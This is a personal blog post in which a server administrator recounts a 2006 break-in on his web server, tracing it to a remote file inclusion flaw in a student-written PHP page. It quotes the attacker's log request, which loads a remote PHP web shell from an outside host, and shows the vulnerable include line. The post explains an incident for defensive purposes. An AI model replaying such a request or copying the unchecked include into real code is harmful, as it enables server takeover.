Joachim Breitner's Homepage
I happen to have my own root server, and since there are always resources left, I did not mind hosting some other people's pages as well. I especially offer all the final classes of my school to host their website, to keep up a consistent domain naming scheme, starting with my own class page, http://04.abi-sgh.de/. This was a nice services to the following classes, as the amout of pictures such a class generates usually exeeds regular hosting constraints. Custom programmed websites, like mine and some more, are nice too.
Now, today, my web server was not running. I tried to restart it, but port 443 was used, and I thought: "WTF"? netstat showed my a process with the strange name of "mysqld_" sitting on that port. ls -l /proc/.../cmd showed a binary named "httpd" in a path "/var/www/...(very deep)/.../.ssh/". Now it dawned me: Someone hacked my server.
A quick "ls -l" in that directory indicated that it was done as the www-data server, and probably no root was gained. There were also two DVD rips laying around, so my server seemd to have been turned in to a movie sharing platform. The "httpd" binary, as "strings" confirmed, is a IRC-fileshareing server called iroffer, and a tool to hide processes was in that directory too.
Luckily, the attackers did not hide their traces too well. The date of the "..." directory gave me the exact time of the attack, and around that time, entries like this one appeared in the access.log:
22.214.171.124 - - [30/Sep/2006:16:26:22 +0200] "POST /index.php?section=http://bote.balikesir.edu.tr/~bote0301/ cmd.gif?http://prctl.iespana.es/cmd.gif?&action=cmd&chdir=/var/www/05.abi-sgh.de/ HTTP/1.1" 200 34224 "http://05.abi-sgh.de/index.php?section=http://bote.balikesir.edu.tr/~bote0301/cmd.gif?http://prctl.iespana.es/cmd.gif?& action=cmd&chdir=/var/www/05.abi-sgh.de/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 1
Until today I thought attacks via PHP only affect the well-known pieces of software like the usual web forum, where the code is public and finding holes pays off, and I was expecting that one of the websites on my server ran such a buggy version of something. It truned out that the index.php affected here is actually a self-programmed piece of code by someone from that class. But I guess the mistake they did is as common as it is stupid, and I also guess that PHP's reputation for being insecure is justified, if this is actually possible.
The relevant piece of code is, after the usual HTML header: <? include($section); ?>. That's it. $section is defined no where, and PHP has a mode where CGI parameters are used one-to-one as global variables. So $section is actually the user's option to the "section=" part of the header. And PHP also seems to open URLs and local files just the same. So the attacker just had to put a PHP code file (the cmd.gif file is actually a php file) somewhere and pass it as the "section". Now, I'm sure with the right server settings and differnet code, PHP can be as secure (or insecure) as perl or python. But Features like that should not be in a web programming language in the first place!
The cmd.gif seems to be some kind of shell for the web, allowing the user to run commands, download stuff etc, and that's how they operated on my machine. I am not sure why the binary they installed got access to port 80 and 443, but I assume that the php they run can somehow exec() the binary, thus taking over the ports, and when the webserver was restarted in the night because of log rotation, it could not come up again. Another puzzling fact is the directory they stored their stuff in. It is not related to the site they hacked, and happend to be one of the least-used parts of /var/www. Maybe they looked for directories with a very long ago atime or something.
I guess I have to have a closer look at what happens on my server. Any maybe I will ban self-written php.
Update: A lot of comments came in with suggestions on how to improve security with foreign PHP content. Thanks to all of you! I also hope that other admins might stumble over this page and read these comments before something happens.